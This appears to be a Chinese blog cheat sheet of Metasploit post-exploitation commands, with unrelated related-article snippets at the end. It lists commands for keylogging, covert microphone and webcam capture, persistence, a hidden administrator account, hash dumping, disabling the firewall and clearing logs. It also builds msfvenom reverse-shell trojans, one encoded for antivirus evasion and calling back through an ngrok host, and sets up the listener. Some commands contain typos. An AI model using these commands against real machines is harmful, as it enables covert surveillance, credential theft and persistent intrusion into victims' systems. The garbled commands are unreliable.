MSF基本使用

2022-09-08 04:33:09 字數 2975 閱讀 2995

鏈結資料庫

linux查詢檔案


find / -name dabase.yml


鏈結資料庫   db_connect -y   path/database.yml


db_status  查詢資料庫鏈結狀態


background 後台


sessions  -i  1  返回


sessions  -l  列出所有session


getwd   檢視遠端主機當前路徑


getlwd  檢視本地當前路徑


search  -d c:\\   -f  *.doc  查詢檔案


upload   3.jpg  c:\\1.jpg   上傳檔案


cat test.txt  檢視檔案


route  檢視路由


getpid  檢視當前程序id


execute -h -f  calc.exe  執行檔案


shell  開啟shell


kill殺死程序


sysinfo  列出系統資訊
程序遷移
ps  檢視所有正在執行的程序


getuid  獲取當前程序的使用者


migrate 程序號  遷移程序     explorer.exe為桌面程序
開啟鍵盤
keyscan_start  開啟鍵盤記錄 (需要有管理員許可權)


keyscan_dump  顯示記錄的資訊


keyscan_stop 關閉鍵盤記錄
錄製聲音
record-mic -d 10  錄製聲音10秒
開啟攝像頭
webcam_list  檢視攝像頭連線


webcam_chat  開啟攝像頭


webcam_stop 關閉攝像頭


webcam_snap開攝像頭截圖


webcam_stream -i 1 -v true
桌面截圖
screenshot  截圖
開啟vnc
run  vnc  開啟vnc
持久化訪問
run metsvc  安裝持久化訪問  


run metsvc  -r   解除安裝安裝


另一種方法


run persistence -x -i 5 -p 445 -r ip
建立 隱藏使用者
net user hacker$ hacker /add  建立隱藏使用者


net localgroup  admininistators  hacker$  /add  新增使用者到管理員組


用getgui建立使用者  並分配管理員許可權   開啟遠端桌面


run getgui -u hacker  -p hacker
獲取憑證(使用者名稱和密碼)
run post/windows/gather/hashdump
判斷是否為虛擬機器
run post/windows/gather/checkvm
獲取目標主機最近的操作

run post/windows/gather/dumplinks

獲取系統安裝程式個補丁

通過shell關閉防火牆

shell


netsh  adcfirewall ser allprofiles srate off
開啟埠**
portfwd add -l 1235  -r  10.10.10.129  -p 3389


這樣就把遠端主機的埠 對映到本機的1235埠
清除日誌
clearev 清除日誌
kali鏈結windows桌面
rdesktop  -u  admin  -p  admin  ip:port
kali命令列與視窗化切換
init 3 命令列  5桌面
msfvenom生成木馬
msfvenom  -p  windows/x64/meterpreter/reverse_tcp  lhost=10.10.10.128   lport=10001 -f exe > /root/config.exe
免殺木馬
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b 『\x00』 lhost=server.ngrok.cclport=00000 -f c
-p 指定payload,–e 編碼器,-i 編碼次數(次數越多免殺機率越高),-b 去除壞字元,lhost 伺服器(ngrok預設為server.ngrok.cc) lport 隧道的埠,-f 生成指定格式(py、exe等,建議生成c)

木馬的使用

設定tcp監聽

use exploit/multi/handler


set payload   windows/x64/meterpreter/reverse_tcp


set lhost 10.10.10.128


ser lport 10001


run
遠端主機執行木馬

windows命令

net  use  檢視網路鏈結


net  user  admin   123456   /add   新增使用者


net  user   admin  密碼    


net  user   admin    /del

Msf 基本用法

msf 基本用法 msfconsole help nmap sn 192.168.208.0 24 主機發現 滲透攻擊過程 需要xp使用者登入系統後才可以利用成功。1.search ms08 067 2.use exploit windows smb ms08 067 netapi use expl...

MSF使用流程

1 天鏡 nessus 極光掃瞄器進行漏洞掃瞄,跟據漏掃結果去msf裡面進行查詢漏洞利用工具 2 開啟msf 通過search搜漏洞編號或漏洞名稱 3 搜到漏洞之後,用use 開啟msf漏洞利用工具 4 輸入info檢視工具相關說明 5 用show options 檢視工具使用方法 6 配置遠端主機...

MSF基本原則概述

msf 即microsoft solution framework 也就是微軟公司推薦做軟體的方法。在 2006 年,伴隨著 visual studio team foundation 2005 的發布,msf4.0 也推出了。其中描述了團隊協作的典型流程和在軟體上的應用,軟體自然就是 vstf了。...